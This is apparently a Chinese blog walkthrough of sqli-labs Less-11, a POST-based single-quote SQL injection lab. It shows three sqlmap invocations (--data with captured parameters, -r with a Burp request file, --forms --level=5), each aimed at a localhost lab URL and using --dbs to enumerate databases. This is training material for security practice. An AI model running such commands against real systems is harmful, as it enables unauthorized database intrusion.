数据库
首页 > 数据库> > sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

作者:互联网

sqli-labs less11 基于错误的POST型单引号字符型注入


一、知识储备

针对post型的表单,sqlmap有三种参数可验证:
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数,最方便

二、验证漏洞

首先打开less11;
在这里插入图片描述
提交任意数据,用burp抓包;
在这里插入图片描述
记下post请求参数;uname=1111&passwd=11111&submit=Submit

这里介绍三种方法去检验该漏洞,满足一种证明该漏洞基本存在。

方法一:–data

找到需要提交的post参数,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs

在这里插入图片描述

方法二:-r

将提交的报文抓包后,把信息存储在一个txt文件中,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -r 文件路径+文件名.txt  --dbs

在这里插入图片描述

方法三:–forms

利用该命令,使sqlmap自己抓包,输入下面命令,–dbs枚举所有数据库名称

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs

在这里插入图片描述
在这里插入图片描述
这时证明该漏洞确实存在。

标签:sqlmap,forms,--,labs,sqli,dbs
来源: https://blog.csdn.net/weixin_44023403/article/details/115609735